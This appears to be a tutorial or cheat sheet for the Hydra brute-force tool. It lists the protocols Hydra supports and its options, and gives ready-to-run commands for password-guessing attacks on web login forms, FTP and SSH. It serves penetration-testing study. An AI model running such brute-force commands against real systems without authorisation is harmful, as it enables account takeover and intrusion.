Hydra is a brute force online password cracking program
- Hydra is typically used to interact with a victim server (for example, web server, FTP server, SSH server, file server) and try a list of username/password combinations.
According to its official repository ↗, Hydra supports, i.e., has the ability to brute force the following protocols: “Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, TeamSpeak (TS2), Telnet, VMware-Auth, VNC and XMPP.”
For more information on the options of each protocol in Hydra, you can check the Kali Hydra tool page ↗.
Usage#
hydra -l [user] -P [wordlist] [uri] -t [no of threads (4)] -V -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-U service module usage details
-V Enables verbose output, which displays each username and password attemptedPost Web Form#
For web forms we can use
`sudo hydra <username> <wordlist> <ip> http-post-form "<path>:<login_credentials>:<invalid_response>"`| Option | Description |
|---|---|
http-post-form | The type of the form is POST |
<path> | the login page URL, for example, login.php |
<login_credentials> | the username and password used to log in, for example, username=^USER^&password=^PASS^ |
<invalid_response> | part of the response when the login fails |
-V | verbose output for every attempt |
eg:
hydra -l admin -P passlist.txt www.website.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V- The login page is only
/, i.e., the main IP address. - The
usernameis the form field where the username is entered - The specified username(s) will replace
^USER^ - The
passwordis the form field where the password is entered - The provided passwords will be replacing
^PASS^ - Finally,
F=incorrectis a string that appears in the server reply when the login fails - if the web server is listening on a non-default port number, you can explicitly specify the port number using
-s <port>
FTP#
- For example, say you know that an FTP user’s username is omar. You can then try a file that contains a list of passwords against an FTP server (10.1.2.3). To accomplish this, you use the following command:
hydra -l omar -P passwords.txt ftp://10.1.2.3
SSH#
hydra -l <username> -P <full path to pass> 10.49.149.162 -t 4 sshWe can also use metaspoit for bruteforcing ssh